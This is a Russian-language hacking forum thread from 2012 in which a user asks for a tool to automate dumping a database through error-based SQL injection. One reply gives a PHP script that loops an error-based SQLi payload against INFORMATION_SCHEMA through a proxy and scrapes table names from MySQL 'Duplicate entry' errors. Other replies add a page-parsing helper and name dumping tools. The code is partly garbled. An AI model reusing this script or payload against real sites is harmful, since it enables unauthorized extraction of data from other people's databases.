Чем не напрягаясь можно получить дампнуть базу через Error Based SQLi?

Discussion in 'Песочница' started by fl00der, 26 Jan 2012.

  1. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,028
    Likes Received:
    310
    Reputations:
    86
    Собственно ситуация, имеется запрос вида
    Инфа выдается нормально.
    Но в базе уйма таблиц, и сидеть менять это число не очень прикалывает.
    Есть ли какой-нидь скрипт/софт, который бы просто прокрутил limit и выдал результат?
    Спасибо.
     
    _________________________
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    уже 100 раз обсуждали, toolza
     
    _________________________
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    PHP:
    <? 
    $i=0
    while(
    $i <= 1000

    $site "http://site.ru?id=1+or+1+group+by+concat((select+concat_ws(SELECT+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+$i,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+"

    $cur=curl_init();  
    curl_setopt($curCURLOPT_URL"$site");     
    curl_setopt($cur,CURLOPT_USERAGENT,"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.8.131 Version/11.10");      
    curl_setopt($cur,CURLOPT_RETURNTRANSFER,1);    
    curl_setopt($curCURLOPT_PROXY"91.223.64.146:8080");      
    $a curl_exec($cur);    
    curl_close($cur);  
    preg_match("/Duplicate entry '(.*?)'/s",$a$ok); 
    echo 
    $ok[1]."<br>"


    $i++; 


    ?>

     
  4. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    нахрена в слепую делать 1к запросов ?)
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    да незачем, методом тыка в 2-3 запроса посмотри сколько всего там значений выводится значений и можно парсить
     
  6. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Toolza от Пашкеллы тебе в помощь!

    Да, и лучше используй такую функцию, чтобы парсить страничку:

    PHP:

    function ex($string$from$to)
    {
    $string explode($from$string2);
    $string explode($to$string[1], 2);
    return 
    $string[0];
    }

    // В $input - полученная курлом страница.

    $answ ex($input'<td align="center">''</td>'); // Выведет то что между ними

     
    _________________________
    #6 <Cyber-punk>, 26 Jan 2012
    Last edited: 26 Jan 2012
  7. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    375
    Likes Received:
    73
    Reputations:
    38
    Да, rsaUnDumper 2.0
    Предназначен для дампа по лимиту (или заданым значениям перебора)